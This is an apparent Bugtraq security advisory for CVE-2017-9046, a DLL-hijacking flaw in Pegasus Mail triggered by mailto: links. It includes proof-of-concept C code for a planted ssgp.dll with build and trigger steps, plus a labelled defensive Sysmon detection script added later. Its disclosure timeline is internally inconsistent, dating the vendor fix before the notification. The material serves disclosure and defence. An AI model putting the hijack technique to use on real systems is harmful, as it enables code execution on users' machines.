
List:       bugtraq
Subject:    CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
From:       apparitionsec () gmail ! com (hyp3rlinx)
Date:       2017-05-22 2:30:27
Message-ID: 201705220230.v4M2URm5000948 () sf01web3 ! securityfocus ! com

[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC


Vendor:
=============
www.pmail.com



Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.



Vulnerability Type:
======================
Remote Code Execution




CVE Reference:
==============
CVE-2017-9046



Security Issue:
================
Pegasus Mail has a DLL load flaw that allows arbitrary code execution when a user clicks an HTML "mailto:" link, provided a DLL named "ssgp.dll" exists on the victim's Desktop. Tested successfully using the Internet Explorer web browser.

e.g.

<a href="mailto:name@victim.com">Link text</a>

Place "ssgp.dll" on the Desktop, then visit the web page in Internet Explorer and click the mailto: link: the arbitrary code is executed and Pegasus (pmail) is then launched.

The user needs to have set up PMAIL with the "mailto:" link option during install.


Exploit:
========
1) Set Pegasus as the default email client for opening emails, and set up PMAIL with the "mailto:" link option during install.


2) Compile "ssgp.dll" as a DLL from the C code below.

#include <windows.h>

// Build (MinGW):
//   gcc -c ssgp.c
//   gcc -shared -o ssgp.dll ssgp.o

// Runs when winpm-32.exe resolves "ssgp.dll" from the Desktop instead of a
// trusted directory; the message box only proves that the load happened.
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
    break;
  }

  // Return TRUE so the loader treats the attach as successful. The original
  // listing returned 0 (FALSE), which makes the load fail after the message
  // box has already been shown.
  return TRUE;
}



3) Place "ssgp.dll" on Desktop


4) Create an HTML file with following in the web server root directory.
<a href="mailto:name@victim.com">Pegasus Exploit POC</a>


5) Open the web page in the Internet Explorer web browser and click the malicious mailto: link.


Our code gets executed...
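A defender-side check for the load pattern the steps above describe, added here as an example and not part of the original advisory: it scans Sysmon Event ID 7 (Image loaded) records, serialised as JSON lines, for winpm-32.exe loading a DLL from a user-writable directory such as the Desktop rather than from its own install directory or a Windows system directory. The install path C:\Path\To\Pegasus, the user name, the file example.dll and the four events are constructed placeholders, not real telemetry.

```python
import json
from pathlib import PureWindowsPath

# Directories an unprivileged user can write to. A DLL resolved from one of
# these rather than the application or System32 directory is the hijack
# pattern the advisory describes (ssgp.dll on the Desktop).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")
SYSTEM_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed Sysmon-style records (not real telemetry). The Pegasus install
# directory and example.dll are placeholders.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 7, "Image": "C:\\Path\\To\\Pegasus\\winpm-32.exe",
     "ImageLoaded": "C:\\Windows\\System32\\user32.dll", "Signed": "true"},
    {"EventID": 7, "Image": "C:\\Path\\To\\Pegasus\\winpm-32.exe",
     "ImageLoaded": "C:\\Users\\alice\\Desktop\\ssgp.dll", "Signed": "false"},
    {"EventID": 7, "Image": "C:\\Path\\To\\Pegasus\\winpm-32.exe",
     "ImageLoaded": "C:\\Path\\To\\Pegasus\\example.dll", "Signed": "true"},
    {"EventID": 1, "Image": "C:\\Path\\To\\Pegasus\\winpm-32.exe",
     "CommandLine": "winpm-32.exe mailto:name@victim.com"},
])


def is_hijack_candidate(event: dict) -> bool:
    """True when winpm-32.exe loads an image from a user-writable directory
    that is neither its own install directory nor a Windows system directory."""
    if event.get("EventID") != 7:
        return False
    exe = PureWindowsPath(event.get("Image", ""))
    if exe.name.lower() != "winpm-32.exe":
        return False
    loaded = event.get("ImageLoaded", "").lower()
    app_dir = str(exe.parent).lower() + "\\"
    if loaded.startswith(app_dir) or loaded.startswith(SYSTEM_PREFIXES):
        return False
    return loaded.startswith(USER_WRITABLE_PREFIXES)


def find_hijack_loads(jsonl: str) -> list:
    """Return the ImageLoaded path of every suspicious load in a JSON-lines feed."""
    hits = []
    for line in jsonl.splitlines():
        if line.strip():
            event = json.loads(line)
            if is_hijack_candidate(event):
                hits.append(event["ImageLoaded"])
    return hits


if __name__ == "__main__":
    for path in find_hijack_loads(SAMPLE_EVENTS):
        print("suspicious DLL load by winpm-32.exe:", path)
```

The same filter expressed as a SIEM rule (process name winpm-32.exe, ImageLoaded under a user profile) catches the Desktop load regardless of the DLL's file name.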



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=====================================
Vendor Notification:  October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).

hyp3rlinx

